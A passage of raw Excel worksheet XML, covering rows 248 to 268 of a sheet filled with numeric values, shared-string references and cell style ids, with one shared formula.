      <c r="S248" s="7"/>
      <c r="T248" s="7"/>
      <c r="U248" s="8"/>
      <c r="V248" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W248" s="2" t="s">
        <v>831</v>
      </c>
      <c r="X248" s="6">
        <v>2.0</v>
      </c>
      <c r="Y248" s="6">
        <v>2.0</v>
      </c>
      <c r="Z248" s="6">
        <v>0.0</v>
      </c>
      <c r="AA248" s="7"/>
      <c r="AB248" s="7"/>
      <c r="AC248" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE248" s="8"/>
      <c r="AF248" s="15"/>
    </row>
    <row r="249">
      <c r="A249" s="6">
        <f t="shared" si="1"/>
        <v>0.8983671934</v>
      </c>
      <c r="B249" s="6">
        <v>1.8164187E7</v>
      </c>
      <c r="C249" s="6">
        <v>1.0</v>
      </c>
      <c r="D249" s="6">
        <v>1.8186525E7</v>
      </c>
      <c r="E249" s="8"/>
      <c r="F249" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G249" s="8"/>
      <c r="H249" s="6">
        <v>3.0</v>
      </c>
      <c r="I249" s="6">
        <v>1340.0</v>
      </c>
      <c r="J249" s="17"/>
      <c r="K249" s="17"/>
      <c r="L249" s="17"/>
      <c r="M249" s="17"/>
      <c r="N249" s="17"/>
      <c r="O249" s="4" t="s">
        <v>832</v>
      </c>
      <c r="P249" s="4" t="s">
        <v>833</v>
      </c>
      <c r="Q249" s="6">
        <v>1056158.0</v>
      </c>
      <c r="R249" s="7"/>
      <c r="S249" s="6">
        <v>1056158.0</v>
      </c>
      <c r="T249" s="7"/>
      <c r="U249" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V249" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W249" s="2" t="s">
        <v>834</v>
      </c>
      <c r="X249" s="6">
        <v>2.0</v>
      </c>
      <c r="Y249" s="6">
        <v>2.0</v>
      </c>
      <c r="Z249" s="6">
        <v>0.0</v>
      </c>
      <c r="AA249" s="7"/>
      <c r="AB249" s="7"/>
      <c r="AC249" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE249" s="8"/>
      <c r="AF249" s="15"/>
    </row>
    <row r="250">
      <c r="A250" s="6">
        <f t="shared" si="1"/>
        <v>0.6331591039</v>
      </c>
      <c r="B250" s="6">
        <v>2.3398328E7</v>
      </c>
      <c r="C250" s="6">
        <v>1.0</v>
      </c>
      <c r="D250" s="6">
        <v>2.3398797E7</v>
      </c>
      <c r="E250" s="8"/>
      <c r="F250" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G250" s="8"/>
      <c r="H250" s="6">
        <v>-2.0</v>
      </c>
      <c r="I250" s="6">
        <v>1275.0</v>
      </c>
      <c r="J250" s="20"/>
      <c r="K250" s="20"/>
      <c r="L250" s="20"/>
      <c r="M250" s="20"/>
      <c r="N250" s="20"/>
      <c r="O250" s="4" t="s">
        <v>835</v>
      </c>
      <c r="P250" s="4" t="s">
        <v>836</v>
      </c>
      <c r="Q250" s="6">
        <v>3255176.0</v>
      </c>
      <c r="R250" s="8"/>
      <c r="S250" s="6">
        <v>3255176.0</v>
      </c>
      <c r="T250" s="8"/>
      <c r="U250" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V250" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W250" s="2" t="s">
        <v>837</v>
      </c>
      <c r="X250" s="6">
        <v>1.0</v>
      </c>
      <c r="Y250" s="6">
        <v>4.0</v>
      </c>
      <c r="Z250" s="6">
        <v>0.0</v>
      </c>
      <c r="AA250" s="8"/>
      <c r="AB250" s="8"/>
      <c r="AC250" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE250" s="8"/>
      <c r="AF250" s="14"/>
    </row>
    <row r="251">
      <c r="A251" s="6">
        <f t="shared" si="1"/>
        <v>0.7331129686</v>
      </c>
      <c r="B251" s="6">
        <v>4.1368153E7</v>
      </c>
      <c r="C251" s="6">
        <v>1.0</v>
      </c>
      <c r="D251" s="7"/>
      <c r="E251" s="8"/>
      <c r="F251" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G251" s="8"/>
      <c r="H251" s="6">
        <v>0.0</v>
      </c>
      <c r="I251" s="6">
        <v>56.0</v>
      </c>
      <c r="J251" s="17"/>
      <c r="K251" s="17"/>
      <c r="L251" s="17"/>
      <c r="M251" s="17"/>
      <c r="N251" s="17"/>
      <c r="O251" s="4" t="s">
        <v>838</v>
      </c>
      <c r="P251" s="4" t="s">
        <v>839</v>
      </c>
      <c r="Q251" s="6">
        <v>7081922.0</v>
      </c>
      <c r="R251" s="7"/>
      <c r="S251" s="6">
        <v>7081922.0</v>
      </c>
      <c r="T251" s="7"/>
      <c r="U251" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V251" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W251" s="2" t="s">
        <v>840</v>
      </c>
      <c r="X251" s="6">
        <v>1.0</v>
      </c>
      <c r="Y251" s="6">
        <v>0.0</v>
      </c>
      <c r="Z251" s="7"/>
      <c r="AA251" s="7"/>
      <c r="AB251" s="7"/>
      <c r="AC251" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE251" s="8"/>
      <c r="AF251" s="15"/>
    </row>
    <row r="252">
      <c r="A252" s="6">
        <f t="shared" si="1"/>
        <v>0.8239038415</v>
      </c>
      <c r="B252" s="6">
        <v>3.1792399E7</v>
      </c>
      <c r="C252" s="6">
        <v>1.0</v>
      </c>
      <c r="D252" s="7"/>
      <c r="E252" s="8"/>
      <c r="F252" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G252" s="8"/>
      <c r="H252" s="6">
        <v>0.0</v>
      </c>
      <c r="I252" s="6">
        <v>311.0</v>
      </c>
      <c r="J252" s="17"/>
      <c r="K252" s="17"/>
      <c r="L252" s="17"/>
      <c r="M252" s="17"/>
      <c r="N252" s="17"/>
      <c r="O252" s="4" t="s">
        <v>841</v>
      </c>
      <c r="P252" s="4" t="s">
        <v>842</v>
      </c>
      <c r="Q252" s="6">
        <v>4413902.0</v>
      </c>
      <c r="R252" s="7"/>
      <c r="S252" s="7"/>
      <c r="T252" s="7"/>
      <c r="U252" s="8"/>
      <c r="V252" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W252" s="2" t="s">
        <v>843</v>
      </c>
      <c r="X252" s="6">
        <v>2.0</v>
      </c>
      <c r="Y252" s="6">
        <v>3.0</v>
      </c>
      <c r="Z252" s="7"/>
      <c r="AA252" s="7"/>
      <c r="AB252" s="7"/>
      <c r="AC252" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE252" s="8"/>
      <c r="AF252" s="15"/>
    </row>
    <row r="253">
      <c r="A253" s="6">
        <f t="shared" si="1"/>
        <v>0.08214617542</v>
      </c>
      <c r="B253" s="6">
        <v>6.8457641E7</v>
      </c>
      <c r="C253" s="6">
        <v>1.0</v>
      </c>
      <c r="D253" s="8"/>
      <c r="E253" s="8"/>
      <c r="F253" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G253" s="8"/>
      <c r="H253" s="6">
        <v>2.0</v>
      </c>
      <c r="I253" s="6">
        <v>937.0</v>
      </c>
      <c r="J253" s="17"/>
      <c r="K253" s="17"/>
      <c r="L253" s="17"/>
      <c r="M253" s="17"/>
      <c r="N253" s="17"/>
      <c r="O253" s="4" t="s">
        <v>844</v>
      </c>
      <c r="P253" s="4" t="s">
        <v>845</v>
      </c>
      <c r="Q253" s="6">
        <v>5740428.0</v>
      </c>
      <c r="R253" s="7"/>
      <c r="S253" s="7"/>
      <c r="T253" s="7"/>
      <c r="U253" s="8"/>
      <c r="V253" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W253" s="2" t="s">
        <v>846</v>
      </c>
      <c r="X253" s="6">
        <v>0.0</v>
      </c>
      <c r="Y253" s="6">
        <v>2.0</v>
      </c>
      <c r="Z253" s="6">
        <v>0.0</v>
      </c>
      <c r="AA253" s="7"/>
      <c r="AB253" s="7"/>
      <c r="AC253" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE253" s="8"/>
      <c r="AF253" s="15"/>
    </row>
    <row r="254">
      <c r="A254" s="6">
        <f t="shared" si="1"/>
        <v>0.8255807555</v>
      </c>
      <c r="B254" s="6">
        <v>4728393.0</v>
      </c>
      <c r="C254" s="6">
        <v>1.0</v>
      </c>
      <c r="D254" s="6">
        <v>4728446.0</v>
      </c>
      <c r="E254" s="8"/>
      <c r="F254" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G254" s="8"/>
      <c r="H254" s="6">
        <v>142.0</v>
      </c>
      <c r="I254" s="6">
        <v>132119.0</v>
      </c>
      <c r="J254" s="17"/>
      <c r="K254" s="17"/>
      <c r="L254" s="17"/>
      <c r="M254" s="17"/>
      <c r="N254" s="17"/>
      <c r="O254" s="4" t="s">
        <v>847</v>
      </c>
      <c r="P254" s="4" t="s">
        <v>848</v>
      </c>
      <c r="Q254" s="6">
        <v>78216.0</v>
      </c>
      <c r="R254" s="7"/>
      <c r="S254" s="6">
        <v>52626.0</v>
      </c>
      <c r="T254" s="7"/>
      <c r="U254" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V254" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W254" s="2" t="s">
        <v>849</v>
      </c>
      <c r="X254" s="6">
        <v>5.0</v>
      </c>
      <c r="Y254" s="6">
        <v>0.0</v>
      </c>
      <c r="Z254" s="6">
        <v>0.0</v>
      </c>
      <c r="AA254" s="7"/>
      <c r="AB254" s="7"/>
      <c r="AC254" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE254" s="8"/>
      <c r="AF254" s="15"/>
    </row>
    <row r="255">
      <c r="A255" s="6">
        <f t="shared" si="1"/>
        <v>0.7544622855</v>
      </c>
      <c r="B255" s="6">
        <v>2.7818043E7</v>
      </c>
      <c r="C255" s="6">
        <v>1.0</v>
      </c>
      <c r="D255" s="7"/>
      <c r="E255" s="8"/>
      <c r="F255" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G255" s="8"/>
      <c r="H255" s="6">
        <v>-1.0</v>
      </c>
      <c r="I255" s="6">
        <v>225.0</v>
      </c>
      <c r="J255" s="17"/>
      <c r="K255" s="17"/>
      <c r="L255" s="17"/>
      <c r="M255" s="17"/>
      <c r="N255" s="17"/>
      <c r="O255" s="4" t="s">
        <v>850</v>
      </c>
      <c r="P255" s="4" t="s">
        <v>851</v>
      </c>
      <c r="Q255" s="6">
        <v>2666751.0</v>
      </c>
      <c r="R255" s="7"/>
      <c r="S255" s="6">
        <v>594235.0</v>
      </c>
      <c r="T255" s="7"/>
      <c r="U255" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V255" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W255" s="2" t="s">
        <v>852</v>
      </c>
      <c r="X255" s="6">
        <v>1.0</v>
      </c>
      <c r="Y255" s="6">
        <v>0.0</v>
      </c>
      <c r="Z255" s="7"/>
      <c r="AA255" s="7"/>
      <c r="AB255" s="7"/>
      <c r="AC255" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE255" s="8"/>
      <c r="AF255" s="15"/>
    </row>
    <row r="256">
      <c r="A256" s="6">
        <f t="shared" si="1"/>
        <v>0.9103314138</v>
      </c>
      <c r="B256" s="6">
        <v>5.2172768E7</v>
      </c>
      <c r="C256" s="6">
        <v>1.0</v>
      </c>
      <c r="D256" s="8"/>
      <c r="E256" s="8"/>
      <c r="F256" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G256" s="8"/>
      <c r="H256" s="6">
        <v>2.0</v>
      </c>
      <c r="I256" s="6">
        <v>74.0</v>
      </c>
      <c r="J256" s="20"/>
      <c r="K256" s="20"/>
      <c r="L256" s="20"/>
      <c r="M256" s="20"/>
      <c r="N256" s="20"/>
      <c r="O256" s="4" t="s">
        <v>853</v>
      </c>
      <c r="P256" s="4" t="s">
        <v>854</v>
      </c>
      <c r="Q256" s="6">
        <v>1813669.0</v>
      </c>
      <c r="R256" s="8"/>
      <c r="S256" s="8"/>
      <c r="T256" s="8"/>
      <c r="U256" s="8"/>
      <c r="V256" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W256" s="2" t="s">
        <v>855</v>
      </c>
      <c r="X256" s="6">
        <v>0.0</v>
      </c>
      <c r="Y256" s="6">
        <v>0.0</v>
      </c>
      <c r="Z256" s="8"/>
      <c r="AA256" s="8"/>
      <c r="AB256" s="8"/>
      <c r="AC256" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE256" s="8"/>
      <c r="AF256" s="14"/>
    </row>
    <row r="257">
      <c r="A257" s="6">
        <f t="shared" si="1"/>
        <v>0.258467936</v>
      </c>
      <c r="B257" s="6">
        <v>7.5533738E7</v>
      </c>
      <c r="C257" s="6">
        <v>1.0</v>
      </c>
      <c r="D257" s="8"/>
      <c r="E257" s="8"/>
      <c r="F257" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G257" s="8"/>
      <c r="H257" s="6">
        <v>0.0</v>
      </c>
      <c r="I257" s="6">
        <v>34.0</v>
      </c>
      <c r="J257" s="20"/>
      <c r="K257" s="20"/>
      <c r="L257" s="20"/>
      <c r="M257" s="20"/>
      <c r="N257" s="20"/>
      <c r="O257" s="4" t="s">
        <v>856</v>
      </c>
      <c r="P257" s="4" t="s">
        <v>857</v>
      </c>
      <c r="Q257" s="6">
        <v>2.1265898E7</v>
      </c>
      <c r="R257" s="8"/>
      <c r="S257" s="8"/>
      <c r="T257" s="8"/>
      <c r="U257" s="8"/>
      <c r="V257" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W257" s="2" t="s">
        <v>858</v>
      </c>
      <c r="X257" s="6">
        <v>0.0</v>
      </c>
      <c r="Y257" s="6">
        <v>1.0</v>
      </c>
      <c r="Z257" s="8"/>
      <c r="AA257" s="8"/>
      <c r="AB257" s="8"/>
      <c r="AC257" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE257" s="8"/>
      <c r="AF257" s="14"/>
    </row>
    <row r="258">
      <c r="A258" s="6">
        <f t="shared" si="1"/>
        <v>0.5460084539</v>
      </c>
      <c r="B258" s="6">
        <v>7.6612263E7</v>
      </c>
      <c r="C258" s="6">
        <v>1.0</v>
      </c>
      <c r="D258" s="7"/>
      <c r="E258" s="8"/>
      <c r="F258" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G258" s="8"/>
      <c r="H258" s="6">
        <v>0.0</v>
      </c>
      <c r="I258" s="6">
        <v>25.0</v>
      </c>
      <c r="J258" s="17"/>
      <c r="K258" s="17"/>
      <c r="L258" s="17"/>
      <c r="M258" s="17"/>
      <c r="N258" s="17"/>
      <c r="O258" s="4" t="s">
        <v>859</v>
      </c>
      <c r="P258" s="4" t="s">
        <v>860</v>
      </c>
      <c r="Q258" s="6">
        <v>2.2173386E7</v>
      </c>
      <c r="R258" s="7"/>
      <c r="S258" s="6">
        <v>1.9785512E7</v>
      </c>
      <c r="T258" s="7"/>
      <c r="U258" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V258" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W258" s="2" t="s">
        <v>861</v>
      </c>
      <c r="X258" s="6">
        <v>1.0</v>
      </c>
      <c r="Y258" s="6">
        <v>0.0</v>
      </c>
      <c r="Z258" s="7"/>
      <c r="AA258" s="7"/>
      <c r="AB258" s="7"/>
      <c r="AC258" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE258" s="8"/>
      <c r="AF258" s="15"/>
    </row>
    <row r="259">
      <c r="A259" s="6">
        <f t="shared" si="1"/>
        <v>0.9367429016</v>
      </c>
      <c r="B259" s="6">
        <v>5.7298432E7</v>
      </c>
      <c r="C259" s="6">
        <v>1.0</v>
      </c>
      <c r="D259" s="6">
        <v>5.7299878E7</v>
      </c>
      <c r="E259" s="8"/>
      <c r="F259" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G259" s="8"/>
      <c r="H259" s="6">
        <v>4.0</v>
      </c>
      <c r="I259" s="6">
        <v>458.0</v>
      </c>
      <c r="J259" s="17"/>
      <c r="K259" s="17"/>
      <c r="L259" s="17"/>
      <c r="M259" s="17"/>
      <c r="N259" s="17"/>
      <c r="O259" s="4" t="s">
        <v>862</v>
      </c>
      <c r="P259" s="4" t="s">
        <v>863</v>
      </c>
      <c r="Q259" s="6">
        <v>1.163907E7</v>
      </c>
      <c r="R259" s="7"/>
      <c r="S259" s="6">
        <v>1.163907E7</v>
      </c>
      <c r="T259" s="7"/>
      <c r="U259" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V259" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W259" s="2" t="s">
        <v>635</v>
      </c>
      <c r="X259" s="6">
        <v>1.0</v>
      </c>
      <c r="Y259" s="6">
        <v>2.0</v>
      </c>
      <c r="Z259" s="6">
        <v>0.0</v>
      </c>
      <c r="AA259" s="7"/>
      <c r="AB259" s="7"/>
      <c r="AC259" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE259" s="8"/>
      <c r="AF259" s="15"/>
    </row>
    <row r="260">
      <c r="A260" s="6">
        <f t="shared" si="1"/>
        <v>0.9333436411</v>
      </c>
      <c r="B260" s="6">
        <v>6.6198126E7</v>
      </c>
      <c r="C260" s="6">
        <v>1.0</v>
      </c>
      <c r="D260" s="7"/>
      <c r="E260" s="8"/>
      <c r="F260" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G260" s="8"/>
      <c r="H260" s="6">
        <v>1.0</v>
      </c>
      <c r="I260" s="6">
        <v>213.0</v>
      </c>
      <c r="J260" s="17"/>
      <c r="K260" s="17"/>
      <c r="L260" s="17"/>
      <c r="M260" s="17"/>
      <c r="N260" s="17"/>
      <c r="O260" s="4" t="s">
        <v>864</v>
      </c>
      <c r="P260" s="4" t="s">
        <v>865</v>
      </c>
      <c r="Q260" s="6">
        <v>1105788.0</v>
      </c>
      <c r="R260" s="7"/>
      <c r="S260" s="7"/>
      <c r="T260" s="7"/>
      <c r="U260" s="8"/>
      <c r="V260" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W260" s="2" t="s">
        <v>866</v>
      </c>
      <c r="X260" s="6">
        <v>0.0</v>
      </c>
      <c r="Y260" s="6">
        <v>5.0</v>
      </c>
      <c r="Z260" s="7"/>
      <c r="AA260" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB260" s="7"/>
      <c r="AC260" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE260" s="8"/>
      <c r="AF260" s="15"/>
    </row>
    <row r="261">
      <c r="A261" s="6">
        <f t="shared" si="1"/>
        <v>0.1496116723</v>
      </c>
      <c r="B261" s="6">
        <v>5.7949991E7</v>
      </c>
      <c r="C261" s="6">
        <v>1.0</v>
      </c>
      <c r="D261" s="8"/>
      <c r="E261" s="8"/>
      <c r="F261" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G261" s="8"/>
      <c r="H261" s="6">
        <v>0.0</v>
      </c>
      <c r="I261" s="6">
        <v>2308.0</v>
      </c>
      <c r="J261" s="20"/>
      <c r="K261" s="20"/>
      <c r="L261" s="20"/>
      <c r="M261" s="20"/>
      <c r="N261" s="20"/>
      <c r="O261" s="4" t="s">
        <v>867</v>
      </c>
      <c r="P261" s="4" t="s">
        <v>868</v>
      </c>
      <c r="Q261" s="6">
        <v>2756066.0</v>
      </c>
      <c r="R261" s="8"/>
      <c r="S261" s="8"/>
      <c r="T261" s="8"/>
      <c r="U261" s="8"/>
      <c r="V261" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W261" s="2" t="s">
        <v>869</v>
      </c>
      <c r="X261" s="6">
        <v>1.0</v>
      </c>
      <c r="Y261" s="6">
        <v>0.0</v>
      </c>
      <c r="Z261" s="6">
        <v>0.0</v>
      </c>
      <c r="AA261" s="8"/>
      <c r="AB261" s="8"/>
      <c r="AC261" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE261" s="8"/>
      <c r="AF261" s="14"/>
    </row>
    <row r="262">
      <c r="A262" s="6">
        <f t="shared" si="1"/>
        <v>0.464616312</v>
      </c>
      <c r="B262" s="6">
        <v>4.9038186E7</v>
      </c>
      <c r="C262" s="6">
        <v>1.0</v>
      </c>
      <c r="D262" s="8"/>
      <c r="E262" s="8"/>
      <c r="F262" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G262" s="8"/>
      <c r="H262" s="6">
        <v>0.0</v>
      </c>
      <c r="I262" s="6">
        <v>2415.0</v>
      </c>
      <c r="J262" s="20"/>
      <c r="K262" s="20"/>
      <c r="L262" s="20"/>
      <c r="M262" s="20"/>
      <c r="N262" s="20"/>
      <c r="O262" s="4" t="s">
        <v>870</v>
      </c>
      <c r="P262" s="4" t="s">
        <v>871</v>
      </c>
      <c r="Q262" s="6">
        <v>9425692.0</v>
      </c>
      <c r="R262" s="8"/>
      <c r="S262" s="6">
        <v>9425692.0</v>
      </c>
      <c r="T262" s="8"/>
      <c r="U262" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V262" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W262" s="2" t="s">
        <v>872</v>
      </c>
      <c r="X262" s="6">
        <v>1.0</v>
      </c>
      <c r="Y262" s="6">
        <v>9.0</v>
      </c>
      <c r="Z262" s="8"/>
      <c r="AA262" s="8"/>
      <c r="AB262" s="8"/>
      <c r="AC262" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE262" s="8"/>
      <c r="AF262" s="14"/>
    </row>
    <row r="263">
      <c r="A263" s="6">
        <f t="shared" si="1"/>
        <v>0.8511893216</v>
      </c>
      <c r="B263" s="6">
        <v>7388609.0</v>
      </c>
      <c r="C263" s="6">
        <v>1.0</v>
      </c>
      <c r="D263" s="6">
        <v>7388632.0</v>
      </c>
      <c r="E263" s="8"/>
      <c r="F263" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G263" s="8"/>
      <c r="H263" s="6">
        <v>1.0</v>
      </c>
      <c r="I263" s="6">
        <v>434.0</v>
      </c>
      <c r="J263" s="20"/>
      <c r="K263" s="20"/>
      <c r="L263" s="20"/>
      <c r="M263" s="20"/>
      <c r="N263" s="20"/>
      <c r="O263" s="4" t="s">
        <v>873</v>
      </c>
      <c r="P263" s="4" t="s">
        <v>874</v>
      </c>
      <c r="Q263" s="6">
        <v>905322.0</v>
      </c>
      <c r="R263" s="8"/>
      <c r="S263" s="6">
        <v>905322.0</v>
      </c>
      <c r="T263" s="8"/>
      <c r="U263" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V263" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W263" s="2" t="s">
        <v>235</v>
      </c>
      <c r="X263" s="6">
        <v>3.0</v>
      </c>
      <c r="Y263" s="6">
        <v>4.0</v>
      </c>
      <c r="Z263" s="8"/>
      <c r="AA263" s="8"/>
      <c r="AB263" s="8"/>
      <c r="AC263" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE263" s="8"/>
      <c r="AF263" s="14"/>
    </row>
    <row r="264">
      <c r="A264" s="6">
        <f t="shared" si="1"/>
        <v>0.4694688763</v>
      </c>
      <c r="B264" s="6">
        <v>5.7936748E7</v>
      </c>
      <c r="C264" s="6">
        <v>1.0</v>
      </c>
      <c r="D264" s="6">
        <v>5.79388E7</v>
      </c>
      <c r="E264" s="8"/>
      <c r="F264" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G264" s="8"/>
      <c r="H264" s="6">
        <v>1.0</v>
      </c>
      <c r="I264" s="6">
        <v>350.0</v>
      </c>
      <c r="J264" s="20"/>
      <c r="K264" s="20"/>
      <c r="L264" s="20"/>
      <c r="M264" s="20"/>
      <c r="N264" s="20"/>
      <c r="O264" s="4" t="s">
        <v>875</v>
      </c>
      <c r="P264" s="4" t="s">
        <v>876</v>
      </c>
      <c r="Q264" s="6">
        <v>1.206735E7</v>
      </c>
      <c r="R264" s="8"/>
      <c r="S264" s="6">
        <v>1.206735E7</v>
      </c>
      <c r="T264" s="8"/>
      <c r="U264" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V264" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W264" s="2" t="s">
        <v>877</v>
      </c>
      <c r="X264" s="6">
        <v>1.0</v>
      </c>
      <c r="Y264" s="6">
        <v>5.0</v>
      </c>
      <c r="Z264" s="6">
        <v>0.0</v>
      </c>
      <c r="AA264" s="8"/>
      <c r="AB264" s="8"/>
      <c r="AC264" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE264" s="8"/>
      <c r="AF264" s="14"/>
    </row>
    <row r="265">
      <c r="A265" s="6">
        <f t="shared" si="1"/>
        <v>0.5060920273</v>
      </c>
      <c r="B265" s="6">
        <v>3.5675397E7</v>
      </c>
      <c r="C265" s="6">
        <v>1.0</v>
      </c>
      <c r="D265" s="7"/>
      <c r="E265" s="8"/>
      <c r="F265" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G265" s="8"/>
      <c r="H265" s="6">
        <v>1.0</v>
      </c>
      <c r="I265" s="6">
        <v>791.0</v>
      </c>
      <c r="J265" s="17"/>
      <c r="K265" s="17"/>
      <c r="L265" s="17"/>
      <c r="M265" s="17"/>
      <c r="N265" s="17"/>
      <c r="O265" s="4" t="s">
        <v>878</v>
      </c>
      <c r="P265" s="4" t="s">
        <v>879</v>
      </c>
      <c r="Q265" s="6">
        <v>1380955.0</v>
      </c>
      <c r="R265" s="7"/>
      <c r="S265" s="7"/>
      <c r="T265" s="2" t="s">
        <v>880</v>
      </c>
      <c r="U265" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V265" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W265" s="2" t="s">
        <v>881</v>
      </c>
      <c r="X265" s="6">
        <v>1.0</v>
      </c>
      <c r="Y265" s="6">
        <v>1.0</v>
      </c>
      <c r="Z265" s="7"/>
      <c r="AA265" s="7"/>
      <c r="AB265" s="7"/>
      <c r="AC265" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE265" s="8"/>
      <c r="AF265" s="15"/>
    </row>
    <row r="266">
      <c r="A266" s="6">
        <f t="shared" si="1"/>
        <v>0.6766912307</v>
      </c>
      <c r="B266" s="6">
        <v>9899841.0</v>
      </c>
      <c r="C266" s="6">
        <v>1.0</v>
      </c>
      <c r="D266" s="8"/>
      <c r="E266" s="8"/>
      <c r="F266" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G266" s="8"/>
      <c r="H266" s="6">
        <v>1.0</v>
      </c>
      <c r="I266" s="6">
        <v>559.0</v>
      </c>
      <c r="J266" s="20"/>
      <c r="K266" s="20"/>
      <c r="L266" s="20"/>
      <c r="M266" s="20"/>
      <c r="N266" s="20"/>
      <c r="O266" s="4" t="s">
        <v>882</v>
      </c>
      <c r="P266" s="4" t="s">
        <v>883</v>
      </c>
      <c r="Q266" s="6">
        <v>512975.0</v>
      </c>
      <c r="R266" s="8"/>
      <c r="S266" s="8"/>
      <c r="T266" s="8"/>
      <c r="U266" s="8"/>
      <c r="V266" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W266" s="2" t="s">
        <v>884</v>
      </c>
      <c r="X266" s="6">
        <v>0.0</v>
      </c>
      <c r="Y266" s="6">
        <v>1.0</v>
      </c>
      <c r="Z266" s="8"/>
      <c r="AA266" s="8"/>
      <c r="AB266" s="8"/>
      <c r="AC266" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE266" s="8"/>
      <c r="AF266" s="14"/>
    </row>
    <row r="267">
      <c r="A267" s="6">
        <f t="shared" si="1"/>
        <v>0.6569156425</v>
      </c>
      <c r="B267" s="6">
        <v>6.0027468E7</v>
      </c>
      <c r="C267" s="6">
        <v>1.0</v>
      </c>
      <c r="D267" s="6">
        <v>6.0076603E7</v>
      </c>
      <c r="E267" s="8"/>
      <c r="F267" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G267" s="8"/>
      <c r="H267" s="6">
        <v>2.0</v>
      </c>
      <c r="I267" s="6">
        <v>2322.0</v>
      </c>
      <c r="J267" s="17"/>
      <c r="K267" s="17"/>
      <c r="L267" s="17"/>
      <c r="M267" s="17"/>
      <c r="N267" s="17"/>
      <c r="O267" s="4" t="s">
        <v>885</v>
      </c>
      <c r="P267" s="4" t="s">
        <v>886</v>
      </c>
      <c r="Q267" s="6">
        <v>7281880.0</v>
      </c>
      <c r="R267" s="7"/>
      <c r="S267" s="6">
        <v>1.2299E7</v>
      </c>
      <c r="T267" s="7"/>
      <c r="U267" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V267" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W267" s="2" t="s">
        <v>887</v>
      </c>
      <c r="X267" s="6">
        <v>2.0</v>
      </c>
      <c r="Y267" s="6">
        <v>0.0</v>
      </c>
      <c r="Z267" s="6">
        <v>0.0</v>
      </c>
      <c r="AA267" s="7"/>
      <c r="AB267" s="7"/>
      <c r="AC267" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE267" s="8"/>
      <c r="AF267" s="15"/>
    </row>
    <row r="268">
      <c r="A268" s="6">
        <f t="shared" si="1"/>
        <v>0.3156726399</v>
      </c>
      <c r="B268" s="6">
        <v>7.2503425E7</v>
      </c>
      <c r="C268" s="6">
        <v>1.0</v>
      </c>
      <c r="D268" s="8"/>
      <c r="E268" s="8"/>
      <c r="F268" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G268" s="8"/>
      <c r="H268" s="6">
        <v>0.0</v>
      </c>
      <c r="I268" s="6">
        <v>1540.0</v>
      </c>
      <c r="J268" s="20"/>
      <c r="K268" s="20"/>
      <c r="L268" s="20"/>
      <c r="M268" s="20"/>
      <c r="N268" s="20"/>
      <c r="O268" s="4" t="s">
        <v>888</v>
      </c>
      <c r="P268" s="4" t="s">
        <v>889</v>
      </c>
      <c r="Q268" s="6">
        <v>1.8588604E7</v>
      </c>
